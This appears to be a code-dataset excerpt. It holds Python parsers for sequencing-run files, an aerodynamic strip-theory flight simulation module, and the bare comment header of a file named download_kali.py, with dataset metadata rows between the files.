pattern=re.compile('DemuxSummaryF1L([0-9]).txt')
for file in glob.glob(os.path.join(self.path, 'DemuxSummaryF1L?.txt')):
lane_nb = pattern.search(file).group(1)
self.result[lane_nb]=OrderedDict()
self.TOTAL[lane_nb] = 0
with open(file, 'rU') as f:
undeterminePart = False
for line in f:
if not undeterminePart:
if "### Columns:" in line:
undeterminePart = True
else:
                        # it means I am reading the index_Sequence Hit_Count records
components = line.rstrip().split('\t')
if len(self.result[lane_nb].keys())< 50:
self.result[lane_nb][components[0]] = int(components[1])
self.TOTAL[lane_nb] += int(components[1])
class LaneBarcodeParser(object):
def __init__(self, path ):
if os.path.exists(path):
self.path=path
self.parse()
else:
raise os.error(" laneBarcode.html cannot be found at {0}".format(path))
def parse(self):
self.sample_data=[]
self.flowcell_data={}
with open(self.path, 'rU') as htmlfile:
bsoup=BeautifulSoup(htmlfile)
flowcell_table=bsoup.find_all('table')[1]
lane_table=bsoup.find_all('table')[2]
keys=[]
values=[]
for th in flowcell_table.find_all('th'):
keys.append(th.text)
for td in flowcell_table.find_all('td'):
values.append(td.text)
self.flowcell_data = dict(zip(keys, values))
keys=[]
rows=lane_table.find_all('tr')
for row in rows[0:]:
if len(row.find_all('th')):
#this is the header row
for th in row.find_all('th'):
                        key=th.text.replace('<br/>', ' ').replace('&gt;', '>')
keys.append(key)
elif len(row.find_all('td')):
values=[]
for td in row.find_all('td'):
values.append(td.text)
d=dict(zip(keys,values))
self.sample_data.append(d)
class DemultiplexingStatsParser(object):
def __init__(self, path ):
if os.path.exists(path):
self.path=path
self.parse()
else:
raise os.error(" DemultiplexingStats.xml cannot be found at {0}".format(path))
def parse(self):
data={}
tree=ET.parse(self.path)
root = tree.getroot()
self.data=xml_to_dict(root)
class SampleSheetParser(object):
"""Parses Samplesheets, with their fake csv format.
Should be instancied with the samplesheet path as an argument.
.header : a dict containing the info located under the [Header] section
.settings : a dict containing the data from the [Settings] section
.reads : a list of the values in the [Reads] section
.data : a list of the values under the [Data] section. These values are stored in a dict format
.datafields : a list of field names for the data section"""
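    # Example (hypothetical path; attributes are populated by parse()):
    #   ss = SampleSheetParser("/path/to/SampleSheet.csv")
    #   ss.header       # dict built from the [Header] section
    #   ss.datafields   # column names found under [Data]
    #   ss.data         # list of per-sample dicts keyed by those column names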
def __init__(self, path ):
self.log=logging.getLogger(__name__)
if os.path.exists(path):
self.parse(path)
else:
raise os.error(" sample sheet cannot be found at {0}".format(path))
def generate_clean_samplesheet(self, fields_to_remove=None, rename_samples=True, rename_qPCR_suffix = False, fields_qPCR= None):
"""Will generate a 'clean' samplesheet, : the given fields will be removed. if rename_samples is True, samples prepended with 'Sample_'
are renamed to match the sample name"""
output=""
if not fields_to_remove:
fields_to_remove=[]
#Header
output+="[Header]{}".format(os.linesep)
for field in self.header:
output+="{},{}".format(field.rstrip(), self.header[field].rstrip())
output+=os.linesep
#Data
output+="[Data]{}".format(os.linesep)
datafields=[]
for field in self.datafields:
if field not in fields_to_remove:
datafields.append(field)
output+=",".join(datafields)
output+=os.linesep
for line in self.data:
line_ar=[]
for field in datafields:
value = line[field]
if rename_samples and 'SampleID' in field :
try:
if rename_qPCR_suffix and 'SampleName' in fields_qPCR:
#substitute SampleID with SampleName, add Sample_ as prefix and remove __qPCR_ suffix
value =re.sub('__qPCR_$', '', 'Sample_{}'.format(line['SampleName']))
else:
#substitute SampleID with SampleName, add Sample_ as prefix
value ='Sample_{}'.format(line['SampleName'])
except:
#otherwise add Sample_ as prefix
value = 'Sample_{}'.format(line['SampleID'])
elif rename_qPCR_suffix and field in fields_qPCR:
value = re.sub('__qPCR_$', '', line[field])
line_ar.append(value)
output+=",".join(line_ar)
output+=os.linesep
return output
def parse(self, path):
flag=None
header={}
reads=[]
settings=[]
csvlines=[]
data=[]
flag= 'data' #in case of HiSeq samplesheet only data section is present
with open(path, 'rU') as csvfile:
for line in csvfile.readlines():
if '[Header]' in line:
flag='HEADER'
elif '[Reads]' in line:
flag='READS'
elif '[Settings]' in line:
flag='SETTINGS'
elif '[Data]' in line:
flag='data'
else:
if flag == 'HEADER':
try:
header[line.split(',')[0]]=line.split(',')[1]
except IndexError as e:
self.log.error("file {} does not seem to be comma separated.".format(path))
                            raise RuntimeError("Could not parse the samplesheet, does not seem to be comma separated")
elif flag == 'READS':
reads.append(line.split(',')[0])
elif flag == 'SETTINGS':
settings.append(line.split(',')[0])
elif flag == 'data':
csvlines.append(line)
reader = csv.DictReader(csvlines)
for row in reader:
linedict={}
for field in reader.fieldnames:
linedict[field]=row[field]
data.append(linedict)
self.datafields=reader.fieldnames
self.data=data
self.settings=settings
self.header=header
self.reads=reads
class RunInfoParser(object):
"""Parses RunInfo.xml.
Should be instancied with the file path as an argument.
.data : a list of hand-picked values :
-Run ID
-Run Number
-Instrument
-Flowcell name
-Run Date
-Reads metadata
-Flowcell layout
"""
def __init__(self, path ):
self.data={}
self.recipe=None
self.path=path
if os.path.exists(path):
self.parse()
else:
raise os.error(" run info cannot be found at {0}".format(path))
def parse(self):
data={}
tree=ET.parse(self.path)
root = tree.getroot()
run=root.find('Run')
data['Id']=run.get('Id')
data['Number']=run.get('Number')
data['Instrument']=run.find('Instrument').text
data['Flowcell']=run.find('Flowcell').text
data['Date']=run.find('Date').text
data['Reads']=[]
for read in run.find('Reads').findall('Read'):
data['Reads'].append(read.attrib)
layout=run.find('FlowcellLayout')
data['FlowcellLayout']=layout.attrib
self.data=data
self.recipe=make_run_recipe(self.data.get('Reads', {}))
def get_read_configuration(self):
"""return a list of dicts containig the Read Configuration
"""
readConfig = []
try:
readConfig = self.data['Reads']
return sorted(readConfig, key=lambda r: int(r.get("Number", 0)))
        except KeyError:
raise RuntimeError('Reads section not present in RunInfo. Check the FC folder.')
class RunParametersParser(object):
"""Parses a runParameters.xml file.
This is a much more general xml parser, it will build a dict from the xml data.
Attributes might be replaced if children nodes have the same tag as the attributes
This does not happen in the current xml file, but if you're planning to reuse this, it may be of interest.
"""
def __init__(self, path ):
self.data={}
self.recipe=None
self.path=path
if os.path.exists(path):
self.parse()
else:
raise os.error(" run parameters cannot be found at {0}".format(path))
def parse(self):
data={}
tree=ET.parse(self.path)
root = tree.getroot()
self.data=xml_to_dict(root)
self.recipe=make_run_recipe(self.data.get('Setup', {}).get('Reads', {}).get('Read', {}))
def make_run_recipe(reads):
"""Based on either runParameters of RunInfo, gathers the information as to how many
readings are done and their length, e.g. 2x150"""
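    # Example: two non-indexed reads of 151 cycles plus one indexed read
    # (IsIndexedRead == 'Y') collapse to the string "2x151".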
nb_reads=0
nb_indexed_reads=0
numCycles=0
for read in reads:
nb_reads+=1
if read['IsIndexedRead'] == 'Y':
nb_indexed_reads+=1
else:
if numCycles and numCycles != read['NumCycles']:
logging.warn("NumCycles in not coherent")
else:
numCycles = read['NumCycles']
if reads:
return "{0}x{1}".format(nb_reads-nb_indexed_reads, numCycles)
return None
def xml_to_dict(root):
current=None
children=list(root)
if children:
current={}
duplicates={}
for child in children:
if len(root.findall(child.tag))>1:
if child.tag not in duplicates:
duplicates[child.tag]=[]
lower=xml_to_dict(child)
duplicates[child.tag].extend(lower.values())
current.update(duplicates)
else:
lower=xml_to_dict(child)
current.update(lower)
if root.attrib:
if current:
if [x in current for x in root.attrib]:
current.update(root.attrib)
else:
                current.update({'attribs': root.attrib})
else:
current= root.attrib
if root.text and root.text.strip() != "":
if current:
if 'text' not in current:
current['text']=root.text
else:
#you're really pushing here, pal
current['xml_text']=root.text
else:
current=root.text
return {root.tag:current}
class CycleTimesParser(object):
def __init__(self, path):
if os.path.exists(path):
self.path = path
self.cycles = []
self.parse()
else:
raise os.error("file {0} cannot be found".format(path))
def parse(self):
"""
parse CycleTimes.txt and return ordered list of cycles
CycleTimes.txt contains records: <date> <time> <barcode> <cycle> <info>
one cycle contains a few records (defined by <cycle>)
parser goes over records and saves the first record of each cycle as start time
and the last record of each cycle as end time
"""
data = []
date_format = '%m/%d/%Y-%H:%M:%S.%f'
with open(self.path, 'r') as file:
cycle_times = file.readlines()
# if file is empty, return
if not cycle_times:
return
# first line is header, don't read it
for cycle_line in cycle_times[1:]:
# split line into strings
cycle_list = cycle_line.split()
cycle_time_obj = {}
# parse datetime
cycle_time_obj['datetime'] = datetime.strptime("{date}-{time}".format(date=cycle_list[0], time=cycle_list[1]), date_format)
# parse cycle number
cycle_time_obj['cycle'] = int(cycle_list[3])
# add object in the list
data.append(cycle_time_obj)
# take the first record as current cycle
current_cycle = {
'cycle_number': data[0]['cycle'],
'start': data[0]['datetime'],
'end': data[0]['datetime']
}
# compare each record with current cycle (except the first one)
for record in data[1:]:
# if we are at the same cycle
if record['cycle'] == current_cycle['cycle_number']:
# override end of cycle with current record
current_cycle['end'] = record['datetime']
# if a new cycle starts
else:
# save previous cycle
self.cycles.append(current_cycle)
# initialize new current_cycle
current_cycle = {
'cycle_number': record['cycle'],
'start': record['datetime'],
'end': record['datetime']
}
# the last records is not saved inside the loop
if current_cycle not in self.cycles:
self.cycles.append(current_cycle) | mit | -6,675,619,845,388,132,000 | 34.982592 | 143 | 0.538921 | false | 4.150379 | false | false | false |
seanny1986/Aerodynamic-Strip-Theory | Aero Strip Theory/forcecalc.py | 1 | 21505 | from __future__ import print_function
import numpy as np
class forcecalc(object):
def __init__(self):
pass
##################--SETTERS--##################
def setsolverparams(self,
timestep,
udot,
vdot,
wdot,
pdot,
qdot,
rdot,
steps,
rho,
g):
# leapfrog integrator solver vars
self.timestep_ = timestep
self.udot_ = udot
self.vdot_ = vdot
self.wdot_ = wdot
self.pdot_ = pdot
self.qdot_ = qdot
self.rdot_ = rdot
# strip theory solver parameters
self.steps_ = steps
self.rho_ = rho
self.g_ = g
# set u value surface parameters
def setuvals( self,
U2Xvals,
U2Yvals,
U2Zvals,
U2func):
self.U2Xvals_ = U2Xvals
self.U2Yvals_ = U2Yvals
self.U2Zvals_ = U2Zvals
self.U2func_ = U2func
# set aircraft parameters
def setacparams(self,
m,
Ixx,
Iyy,
Izz,
proprad,
fuserad,
x_cg,
CD0_b,
dCDb_dB,
dCDb_dA,
alphamin,
alphamax):
self.m_ = m
self.Ixx_ = Ixx
self.Iyy_ = Iyy
self.Izz_ = Izz
# fuselage geometry
self.proprad_ = proprad
self.fuserad_ = fuserad
self.x_cg_ = x_cg
# fuselage drag values
self.CD0_b_ = CD0_b
self.dCDb_dB_ = dCDb_dB
self.dCDb_dA_ = dCDb_dA
# stall points
self.alphamin_ = alphamin*np.pi/180
self.alphamax_ = alphamax*np.pi/180
# set wing geometry
def setwingparams( self,
wspan,
winc,
rc_w,
tc_w,
qtc_sweep_w,
wing_root_le_x,
dCL_da_w,
dCL_de_w,
CL0_w,
CD0_w,
Y_w,
y_w,
e_w):
self.wspan_ = wspan
self.winc_ = winc*np.pi/180
self.rc_w_ = rc_w
self.tc_w_ = tc_w
self.qtc_sweep_w_ = qtc_sweep_w*np.pi/180
self.wing_root_le_x_ = wing_root_le_x
# wing lift curve slope values
self.dCL_da_w_ = dCL_da_w
self.dCL_de_w_ = dCL_de_w
self.CL0_w_ = CL0_w
self.CD0_w_ = CD0_w
        # wing control surface y placement (start and end)
self.Y_w_ = Y_w
self.y_w_ = y_w
        # oswald efficiency factor wing
self.e_w_ = e_w
# set horizontal tail geometry
def sethtailparams( self,
htspan,
htinc,
rc_ht,
tc_ht,
qtc_sweep_ht,
htail_root_le_x,
dCL_da_ht,
dCL_de_ht,
CL0_ht,
CD0_ht,
Y_ht,
y_ht,
e_ht):
self.htspan_ = htspan
self.htinc_ = htinc*np.pi/180
self.rc_ht_ = rc_ht
self.tc_ht_ = tc_ht
self.qtc_sweep_ht_ = qtc_sweep_ht*np.pi/180
self.htail_root_le_x_ = htail_root_le_x
# horizontal tailplane lift-curve slope values
self.dCL_da_ht_ = dCL_da_ht
self.dCL_de_ht_ = dCL_de_ht
self.CL0_ht_ = CL0_ht
self.CD0_ht_ = CD0_ht
# htail control surface y placement (start and end)
self.Y_ht_ = Y_ht
self.y_ht_ = y_ht
# oswald efficiency factor htail
self.e_ht_ = e_ht
# set vertical tail geometry
def setvtailparams( self,
vtspan,
vtinc,
rc_vt,
tc_vt,
qtc_sweep_vt,
vtail_root_le_x,
dCL_da_vt,
dCL_de_vt,
CL0_vt,
CD0_vt,
Y_vt,
y_vt,
e_vt):
self.vtspan_ = vtspan
self.vtinc_ = vtinc*np.pi/180
self.rc_vt_ = rc_vt
self.tc_vt_ = tc_vt
self.qtc_sweep_vt_ = qtc_sweep_vt*np.pi/180
self.vtail_root_le_x_ = vtail_root_le_x
        # vertical tail lift curve slope values
self.dCL_da_vt_ = dCL_da_vt
self.dCL_de_vt_ = dCL_de_vt
self.CL0_vt_ = CL0_vt
self.CD0_vt_ = CD0_vt
        # vertical tail control surface y placement (start and end)
self.Y_vt_ = Y_vt
self.y_vt_ = y_vt
        # oswald efficiency factor vertical tail
self.e_vt_ = e_vt
#build wing geometry
def buildwing(self):
span = self.wspan_
rc = self.rc_w_
tc = self.tc_w_
steps = self.steps_
rootx = self.wing_root_le_x_
self.b_w_ = span/2
self.cbar_w_ = (rc+tc)/2
self.Sref_w_ = self.cbar_w_*span
self.AR_w_ = span**2/self.Sref_w_
self.w_el_ = self.b_w_/steps
self.wing_ = np.linspace(self.w_el_/2, (span-self.w_el_)/2, steps)
self.chord_w_ = self.chord(self.wing_, span, self.Sref_w_, rc, tc)
self.le_sweep_w_ = np.arctan2((self.b_w_*np.tan(self.qtc_sweep_w_)+0.25*(rc-tc)), self.b_w_)
self.x_ac_w_ = rootx+0.25*self.chord_w_+np.multiply(np.tan(self.le_sweep_w_), self.wing_)
# build horizontal tail geometry
def buildhoztail(self):
span = self.htspan_
rc = self.rc_ht_
tc = self.tc_ht_
steps = self.steps_
rootx = self.htail_root_le_x_
self.b_ht_ = span/2
self.cbar_ht_ = (rc+tc)/2
self.Sref_ht_ = self.cbar_ht_*span
self.AR_ht_ = span**2/self.Sref_ht_
self.ht_el_ = self.b_ht_/steps
self.htail_ = np.linspace(self.ht_el_/2, (span-self.ht_el_)/2, steps)
self.chord_ht_ = self.chord(self.htail_, span, self.Sref_ht_, rc, tc)
self.le_sweep_ht_ = np.arctan2((self.b_ht_*np.tan(self.qtc_sweep_ht_)+0.25*(rc-tc)), self.b_ht_)
self.x_ac_ht_ = rootx+0.25*self.chord_ht_+np.multiply(np.tan(self.le_sweep_ht_), self.htail_)
# build vertical tail geometry
def buildvertail(self):
span = self.vtspan_
rc = self.rc_vt_
tc = self.tc_vt_
steps = self.steps_
rootx = self.vtail_root_le_x_
self.cbar_vt_ = (rc+tc)/2
self.Sref_vt_ = self.cbar_vt_*span
self.AR_vt_ = span**2/self.Sref_vt_
self.vt_el_ = span/steps
self.vtail_ = np.linspace(self.vt_el_/2, (span-self.vt_el_)/2, steps)
self.chord_vt_ = self.chord(self.vtail_, span, self.Sref_vt_, rc, tc)
self.le_sweep_vt_ = np.arctan2((span*np.tan(self.qtc_sweep_vt_)+0.25*(rc-tc)), span)
self.x_ac_vt_ = rootx+0.25*self.chord_vt_+np.multiply(np.tan(self.le_sweep_vt_), self.vtail_)
# build fuselage and prop geometry
def buildfuseandprop(self):
self.A_b_ref_ = np.pi*self.fuserad_**2
self.diskA_ = np.pi*self.proprad_**2
# build aircraft geometry to be used for forcecalc
def buildgeom(self):
self.buildwing()
self.buildhoztail()
self.buildvertail()
self.buildfuseandprop()
# calculate body forces acting on the aircraft using strip theory
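    # Sketch of the approach: each lifting surface is split into 'steps' spanwise strips;
    # for every strip the local velocity (u,v,w) gives a local angle of attack, which gives
    # local CL/CD, hence lift/drag per strip, which are resolved into body axes and summed
    # into total forces (XF, YF, ZF) and moments (LM, MM, NM) about the centre of gravity.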
def forcecalc( self,
power,
u,
v,
w,
p,
q,
r,
aileron,
elevator,
rudder):
# calc thrust force
thrust = self.thrustcalc(power, u)
# creating left and right wings to keep axes consistent
lw = -np.flip(self.wing_, 0)
rw = self.wing_
# calc local velocity components for each strip on the wing (u,v,w)
u_w_lw = u+lw*r
u_w_rw = u+rw*r
v_w = v*np.ones(np.size(rw))
w_w_lw = w+p*lw-q*(self.x_cg_-self.x_ac_w_)
w_w_rw = w+p*rw-q*(self.x_cg_-self.x_ac_w_)
        # calc local velocity components for each strip on the horizontal tail (u,v,w)
lht = -np.flip(self.htail_, 0)
rht = self.htail_
u_ht_lht = u+lht*r
u_ht_rht = u+rht*r
v_ht = v-r*(self.x_cg_-self.x_ac_ht_)
w_ht_lht = w+p*lht-q*(self.x_cg_-self.x_ac_ht_)
w_ht_rht = w+p*rht-q*(self.x_cg_-self.x_ac_ht_)
# calc local velocity components for each strip on the vertical tail (u,v,w)
u_vt = u-self.vtail_*q
v_vt = v+p*self.vtail_-r*(self.x_cg_-self.x_ac_vt_)
w_vt = w-q*(self.x_cg_-self.x_ac_vt_)
# calc local local angles of attack for each strip on the wings, ht, vt, including wing incidence
        # winc_/htinc_ are already stored in radians by the setters, so no further conversion here
        alpha_lw = np.arctan2(w_w_lw, u_w_lw)+self.winc_
        alpha_rw = np.arctan2(w_w_rw, u_w_rw)+self.winc_
        alpha_lht = np.arctan2(w_ht_lht, u_ht_lht)+self.htinc_
        alpha_rht = np.arctan2(w_ht_rht, u_ht_rht)+self.htinc_
alpha_vt = np.arcsin(v_vt/np.sqrt(u_vt**2+v_vt**2+w_vt**2))
# calc local local lift coefficients for each strip on the wings, ht, vt
CL_lw = self.CL(lw, self.dCL_da_w_, alpha_lw, self.CL0_w_, -aileron, self.dCL_de_w_, -self.Y_w_, -self.y_w_)
CL_rw = self.CL(rw, self.dCL_da_w_, alpha_rw, self.CL0_w_, aileron, self.dCL_de_w_, self.Y_w_, self.y_w_)
CL_lht = self.CL(lht, self.dCL_da_ht_, alpha_lht, self.CL0_ht_, elevator, self.dCL_de_ht_, self.Y_ht_, self.y_ht_)
CL_rht = self.CL(rht, self.dCL_da_ht_, alpha_rht, self.CL0_ht_, elevator, self.dCL_de_ht_, self.Y_ht_, self.y_ht_)
CL_vt = self.CL(self.vtail_, self.dCL_da_vt_, alpha_vt, self.CL0_vt_, rudder, self.dCL_de_vt_, self.Y_vt_, self.y_vt_)
# calc local local moment coefficients for each strip on the wings, ht, vt
#CM_lw = self.CM(lw, self.dCM_da_w_, alpha_lw, self.CM0_w_, -aileron, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_rw = self.CM(rw, self.dCM_da_w_, alpha_lw, self.CM0_w_, aileron, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_lht = self.CM(lht, self.dCM_da_ht_, alpha_lw, self.CM0_ht_, elevator, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_rht = self.CM(rht, self.dCM_da_ht_, alpha_lw, self.CM0_ht_, elevator, self.dCM_de_w_, self.Y_w_, self.y_w_)
#CM_vt = self.CM(self.vtail_, self.dCM_da_vt_, alpha_lw, self.CM0_vt_, rudder, self.dCM_de_w_, self.Y_w_, self.y_w_)
# calc constant values
K1 = self.AR_w_*self.e_w_*np.pi
K2 = self.AR_ht_*self.e_ht_*np.pi
K3 = self.AR_vt_*self.e_vt_*np.pi
# calc drag coefficients for wings, ht, vt
CD_lw = self.CD0_w_+CL_lw**2/K1
CD_rw = self.CD0_w_+CL_rw**2/K1
CD_lht = self.CD0_ht_+CL_lht**2/K2
CD_rht = self.CD0_ht_+CL_rht**2/K2
CD_vt = self.CD0_vt_+CL_vt**2/K3
# calc local velocities
Vsq_lw = u_w_lw**2+v_w**2+w_w_lw**2
Vsq_rw = u_w_rw**2+v_w**2+w_w_rw**2
Vsq_lht = u_ht_lht**2+v_ht**2+w_ht_lht**2
Vsq_rht = u_ht_rht**2+v_ht**2+w_ht_rht**2
Vsq_vt = u_vt**2+v_vt**2+w_vt**2
# constants, elemental areas for wings, ht, vt
K = 0.5*self.rho_
A_w = self.w_el_*self.chord_w_
A_ht = self.ht_el_*self.chord_ht_
A_vt = self.vt_el_*self.chord_vt_
# calc lift force in wings, ht, vt
LIFT_LW = CL_lw*K*Vsq_lw*np.flip(A_w, 0)
LIFT_RW = CL_rw*K*Vsq_rw*A_w
LIFT_LHT = CL_lht*K*Vsq_lht*np.flip(A_ht, 0)
LIFT_RHT = CL_rht*K*Vsq_rht*A_ht
LIFT_VT = CL_vt*K*Vsq_vt*A_vt
# calc drag force in wings, ht, vt
DRAG_LW = CD_lw*K*Vsq_lw*np.flip(A_w, 0)
DRAG_RW = CD_rw*K*Vsq_rw*A_w
DRAG_LHT = CD_lht*K*Vsq_lht*np.flip(A_ht, 0)
DRAG_RHT = CD_rht*K*Vsq_rht*A_ht
DRAG_VT = CD_vt*K*Vsq_vt*A_vt
# calc pitching moments in wings, ht, vt
#PITCH_LW = CM_lw*K*Vsq_lw*np.flip(A_ht, 0)*np.flip(self.chord_w_, 0)
#PITCH_RW = CM_rw*K*Vsq_rw*A_w*self.chord_w_
#PITCH_LHT = CM_lht*K*Vsq_lht*np.flip(A_ht, 0)*np.flip(self.chord_ht_, 0)
#PITCH_RHT = CM_rht*K*Vsq_rht*A_ht*self.chord_ht_
#PITCH_VT = CM_vt*K*Vsq_vt*A_vt*self.chord_vt_
        # total pitching moment due to lift and sweep
#TOTAL_PITCH = PITCH_LW+PITCH_RW+PITCH_LHT+PITCH_RHT+PITCH_VT
# calc force in body X direction in wings, ht, vt
LW_X = LIFT_LW*np.sin(alpha_lw)-DRAG_LW*np.cos(alpha_lw)
RW_X = LIFT_RW*np.sin(alpha_rw)-DRAG_RW*np.cos(alpha_rw)
LHT_X = LIFT_LHT*np.sin(alpha_lht)-DRAG_LHT*np.cos(alpha_lht)
RHT_X = LIFT_RHT*np.sin(alpha_rht)-DRAG_RHT*np.cos(alpha_rht)
VT_X = LIFT_VT*np.sin(alpha_vt)-DRAG_VT*np.cos(alpha_vt)
# calc force in body Y direction in wings, ht, vt
VT_Y = LIFT_VT*np.cos(alpha_vt)+DRAG_VT*np.sin(alpha_vt)
# calc force in body Z direction in wings, ht, vt
LW_Z = LIFT_LW*np.cos(alpha_lw)+DRAG_LW*np.sin(alpha_lw)
RW_Z = LIFT_RW*np.cos(alpha_rw)+DRAG_RW*np.sin(alpha_rw)
LHT_Z = LIFT_LHT*np.cos(alpha_lht)+DRAG_LHT*np.sin(alpha_lht)
RHT_Z = LIFT_RHT*np.cos(alpha_rht)+DRAG_RHT*np.sin(alpha_rht)
# Total body forces
XF = float(thrust)+np.sum(LW_X)+np.sum(RW_X)+np.sum(LHT_X)+np.sum(RHT_X)+np.sum(VT_X)
YF = np.sum(VT_Y)
ZF = np.sum(LW_Z)+np.sum(RW_Z)+np.sum(LHT_Z)+np.sum(RHT_Z)
# Moments about body X, Y, Z axes
LM = np.sum(-lw*LW_Z-rw*RW_Z)+np.sum(-lht*LHT_Z-rht*RHT_Z)+np.sum(self.vtail_*VT_Y)
MM = np.sum((LW_Z+RW_Z)*(self.x_cg_-self.x_ac_w_))+np.sum((LHT_Z+RHT_Z)*(self.x_cg_-self.x_ac_ht_))+\
np.sum(self.vtail_*VT_X)#+np.sum(TOTAL_PITCH)
NM = np.sum(-rw*RW_X-lw*LW_X)+np.sum(-rht*RHT_X-lht*LHT_X)
print(XF, YF, ZF, LM, MM, NM)
return [XF, YF, ZF, LM, MM, NM]
# uses an interpolation function to calculate the exhaust velocity and thrust of the prop using momentum theory
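    # Assumed actuator-disk (momentum theory) relation:
    #   thrust = 0.5 * rho * disk_area * (u_exhaust**2 - u_freestream**2)
    # where u_exhaust comes from the interpolated U2 surface set in setuvals().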
def thrustcalc( self,
power,
u):
if power>0:
            u2 = self.U2func_(power, u)
            force = 0.5*self.rho_*self.diskA_*(u2**2-u**2)
else:
force = 0
return force
# calculates the chord of the wing at each point in its station
def chord( self,
wing,
span,
area,
rc,
tc):
k = tc/rc
A = 2*area/((1+k)*span)
B = 1*(1-k)/span
res = A*(1-B*wing)
return res
# calculates the lift coefficient at each station along the wing
def CL( self,
wing,
dCL_da,
alpha,
CL0,
displacement,
dCL_de,
pos1,
pos2):
aileronCL = self.heaviside(wing, pos1, pos2)
stalled = (alpha >= self.alphamin_) & (alpha <= self.alphamax_)
res = stalled.astype(int)*(CL0+dCL_da*alpha+aileronCL*dCL_de*displacement)
return res
# calculates the moment coefficient at each station along the wing
def CM( self,
wing,
dCM_da,
alpha,
CM0,
displacement,
dCM_de,
pos1,
pos2):
aileronCL = self.heaviside(wing, pos1, pos2)
        stalled = (alpha >= self.alphamin_) & (alpha <= self.alphamax_)
res = stalled.astype(int)*(CM0+dCM_da*alpha+aileronCL*dCM_de*displacement)
return res
# heaviside operator, returns a vector of 1s and 0s to make array operations easier
def heaviside( self,
wing,
pos1,
pos2):
res = (wing >= pos1) & (wing <= pos2)
return res.astype(int)
    # leap frog integrator to calculate accelerations and velocities in the body frame,
    # and displacements in the inertial frame
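    # Update scheme used below (a leapfrog-style sketch, per state variable):
    #   v_new = v_old + 0.5*(a_prev + a_now)*dt
    #   x_new = x_old + v_new*dt + 0.5*a_now*dt**2   (after rotating to the inertial frame)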
def nlti( self,
u,
v,
w,
p,
q,
r,
x,
y,
z,
phi,
theta,
psi,
A):
# linear accelerations in the body frame
du_dt = float(A[0]/self.m_-self.g_*np.sin(theta)-q*w+r*v)
dv_dt = float(A[1]/self.m_+self.g_*np.cos(theta)*np.sin(phi)-r*u+p*w)
dw_dt = float(A[2]/self.m_+self.g_*np.cos(theta)*np.cos(phi)-p*v+q*u)
# angular accelerations in the body frame
dp_dt = float(A[3]/self.Ixx_-(self.Izz_-self.Iyy_)/self.Ixx_*q*r)
dq_dt = float(A[4]/self.Iyy_-(self.Ixx_ - self.Izz_)/self.Iyy_*r*p)
dr_dt = float(A[5]/self.Izz_-(self.Iyy_ - self.Ixx_)/self.Izz_*p*q)
# half time step representation of linear velocities
u += 0.5*(self.udot_+du_dt)*self.timestep_
v += 0.5*(self.vdot_+dv_dt)*self.timestep_
w += 0.5*(self.wdot_+dw_dt)*self.timestep_
# half time step representation of angular velocities
p += 0.5*(self.pdot_+dp_dt)*self.timestep_
q += 0.5*(self.qdot_+dq_dt)*self.timestep_
r += 0.5*(self.rdot_+dr_dt)*self.timestep_
# using cosine matrices to convert velocities and accelerations to inertial frame
# (is there a better way to handle accelerations?)
I = self.lindcm([-phi, -theta, -psi], [du_dt, dv_dt, dw_dt])
X = self.lindcm([-phi, -theta, -psi], [u, v, w])
J = self.angdcm([-phi, -theta, -psi], [dp_dt, dq_dt, dr_dt])
W = self.angdcm([-phi, -theta, -psi], [p, q, r])
# linear displacements in the inertial frame
x += X[0]*self.timestep_+0.5*I[0]*self.timestep_**2
y += X[1]*self.timestep_+0.5*I[1]*self.timestep_**2
z += X[2]*self.timestep_+0.5*I[2]*self.timestep_**2
# angular displacements in the inertial frame
phi += W[0]*self.timestep_+0.5*J[0]*self.timestep_**2
theta += W[1]*self.timestep_+0.5*J[1]*self.timestep_**2
psi += W[2]*self.timestep_+0.5*J[2]*self.timestep_**2
        # store velocities so that in the next step, the half time step velocities can be calculated
self.udot_ = du_dt
self.vdot_ = dv_dt
self.wdot_ = dw_dt
self.pdot_ = dp_dt
self.qdot_ = dq_dt
self.rdot_ = dr_dt
return [u, v, w,
p, q, r,
x, y, z,
phi, theta, psi]
# direction cosine matrix function
def lindcm( self,
A,
B):
phi = A[0]
theta = A[1]
psi = A[2]
DCM = np.array([[np.cos(theta)*np.cos(psi), np.cos(theta)*np.sin(psi), -np.sin(theta)],
[np.sin(phi)*np.sin(theta)*np.cos(psi)-np.cos(phi)*np.sin(psi),
np.sin(phi)*np.sin(theta)*np.sin(psi)+np.cos(phi)*np.cos(psi),
np.sin(phi)*np.cos(theta)],
[np.cos(phi)*np.sin(theta)*np.cos(psi)+np.sin(phi)*np.sin(psi),
np.cos(phi)*np.sin(theta)*np.sin(psi)-np.sin(phi)*np.cos(psi),
np.cos(phi)*np.cos(theta)]])
transform = np.dot(np.transpose(DCM), np.array(B))
return transform
# angular cosine matrix function
def angdcm( self,
A,
B):
phi = A[0]
theta = A[1]
ACM = np.array([[1, np.sin(phi)*np.tan(theta), np.cos(phi)*np.tan(theta)],
[0, np.cos(phi), -np.sin(phi)],
[0, np.sin(phi)/np.cos(theta), np.cos(phi)/np.cos(theta)]])
W = np.dot(ACM, np.array(B))
return W
# calculate body force and moment coefficients
def coefs( self,
u,
v,
w,
A):
XF, YF, ZF = A[0], A[1], A[2]
LM, MM, NM = A[3], A[4], A[5]
q = 0.5*self.rho_*(u**2+v**2+w**2)
CX = XF/q/self.Sref_w_
CY = YF/q/self.Sref_w_
CZ = ZF/q/self.Sref_w_
CL = LM/q/self.Sref_w_/self.wspan_
CM = MM/q/self.Sref_w_/self.cbar_w_
CN = NM/q/self.Sref_w_/self.wspan_
return [CX, CY, CZ, CL, CM, CN]
    def plotaircraft( self,
                      ax,
                      X):
        x, y, z = X[0:3]
        # generate geometry using sizing
        # xltedge =
        yltedge = np.linspace(-self.wspan_/2, 0, 50)
        zltedge = np.zeros_like(yltedge)
        # xrtedge =
        yrtedge = np.linspace(0, self.wspan_/2, 50)
        zrtedge = np.zeros_like(yrtedge)
        xltip = np.linspace(0, self.tc_w_, 50)
        # yltip
        zltip = np.zeros_like(xltip)
        xrtip = np.linspace(0, self.tc_w_, 50)
# yrtip
# xlledge =
# xrledge =
# ylledge =
# yrledge =
# rotate geometry
# plot geometry
| gpl-3.0 | -3,505,475,472,434,140,700 | 35.511036 | 126 | 0.487608 | false | 2.815528 | false | false | false |
TryCatchHCF/DumpsterFire | FireModules/FileDownloads/download_kali.py | 1 | 1314 | #!/usr/bin/python
#
# Filename:
#
# Version: 1.0.0
#
# Author: Joe Gervais (TryCatchHCF)
#
# Summary:
#
